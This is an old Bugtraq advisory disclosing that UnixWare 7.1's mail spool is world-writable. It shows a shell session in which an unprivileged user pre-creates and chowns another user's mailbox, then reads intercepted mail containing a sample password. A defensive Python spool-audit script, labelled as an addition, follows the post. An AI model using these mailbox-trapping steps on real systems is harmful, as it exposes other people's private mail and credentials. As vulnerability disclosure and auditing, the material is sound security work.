Bugtraq mailing list archives

UnixWare read/modify users' mail


From: btellier () USA NET (Brock Tellier)
Date: Fri, 3 Dec 1999 21:03:43 MST


Greetings,

OVERVIEW
Any user can read/modify others' mail.

BACKGROUND
Only UnixWare 7.1 was tested.

DETAILS
Imagine my surprise when I saw that /var/mail was mode 777.  As such, any
user may create a file called /var/mail/<username> with a mode readable by
him and trap all incoming mail.  Afraid of getting caught? chown the file
to <username> (see my advisory on this subject), leaving it still
world-readable, and no one will ever know who did it.  

All of this assumes, of course, that the user has not received any mail
yet.  If you keep track of your /etc/passwd file, you can monitor for new
entries and create the files as needed.

This permissions problem obviously opens the door for all sorts of
problems with symlinks and such.  I would imagine that some mail delivery
programs which aren't as smart as sendmail will follow symlinks in
/var/mail.

And as if all this wasn't bad enough, UnixWare's /usr/bin/mail is a BIG
LIE:

bash-2.02$ cat /usr/bin/mail
#!/bin/sh
cat > /dev/null
exit 0
bash-2.02$ 

;)

EXPLOIT

bash-2.02$ id
uid=106(xnec) gid=1(other)
bash-2.02$ pwd
/var/mail
bash-2.02$ touch btellier
bash-2.02$ chown btellier btellier
bash-2.02$ ls -la btellier
-rw-r--r--    1 btellier other             0 Dec  4 07:54 btellier

Now wait for btellier to get some mail...

bash-2.02$ ls -la btellier
-rw-r--r--    1 btellier other           410 Dec  4 07:55 btellier
bash-2.02$ cat btellier
Fromroot Sat Dec  4 07:55:29 1999
Return-Path: root
Received: (from root@localhost) by localhost (8.8.7/UW7.1.0) id HAA04842
for btellier; Sat, 4 Dec 1999 07:55:29 -0600 (CST)
Date: Sat, 4 Dec 1999 07:55:29 -0600 (CST)
From: root@localhost
Message-Id: <199912041355.HAA04842@localhost>
Status: 
X-Status: 
X-SCO-PAD: XXXXXX
X-SCO-UID: 1
Content-Length: 52

your ueber-secure password on 0wned.com is a@f9;se0
bash-2.02$ 

Brock Tellier
UNIX Systems Administrator
Chicago, IL, USA
btellier () usa net
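
An added example for administrators, not part of the original post: a Python audit of a mail spool directory for the conditions described above (a world-writable spool, mailbox files other users can read, and symlinks). The function names audit_spool, owner_name and demo_spool are hypothetical, and the sample spool is constructed in a temporary directory.

```python
import os
import pwd
import stat
import tempfile

def owner_name(uid):
    """Map a uid to a login name, or to the number if it has no passwd entry."""
    try:
        return pwd.getpwuid(uid).pw_name
    except KeyError:
        return str(uid)

def audit_spool(spool="/var/mail", owner_of=owner_name):
    """Return (path, problem) findings for a mail spool directory."""
    findings = []
    dmode = os.lstat(spool).st_mode
    if dmode & stat.S_IWOTH:
        # Any local user can create <spool>/<username> before first delivery.
        detail = "sticky bit set" if dmode & stat.S_ISVTX else "no sticky bit"
        findings.append((spool, f"world-writable directory ({detail})"))
    for name in sorted(os.listdir(spool)):
        path = os.path.join(spool, name)
        st = os.lstat(path)  # lstat so a symlink is reported, not followed
        if stat.S_ISLNK(st.st_mode):
            findings.append((path, "symlink in spool"))
        elif not stat.S_ISREG(st.st_mode):
            findings.append((path, "not a regular file"))
        else:
            if st.st_mode & (stat.S_IROTH | stat.S_IWOTH):
                findings.append((path, "mailbox accessible to other users"))
            if owner_of(st.st_uid) != name:
                findings.append((path, "owner does not match mailbox name"))
    return findings

def demo_spool():
    """Constructed sample: mode-777 spool, 644 mailbox, dangling symlink."""
    spool = tempfile.mkdtemp()
    os.chmod(spool, 0o777)
    box = os.path.join(spool, "btellier")
    open(box, "w").close()
    os.chmod(box, 0o644)
    os.symlink("elsewhere", os.path.join(spool, "newuser"))
    return spool

if __name__ == "__main__":
    for path, problem in audit_spool(demo_spool()):
        print(f"{path}: {problem}")
```

The owner check alone does not catch the case shown in the post, because the file there was chowned to the mailbox's user; the mode check on the file and on the directory is what reports it.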
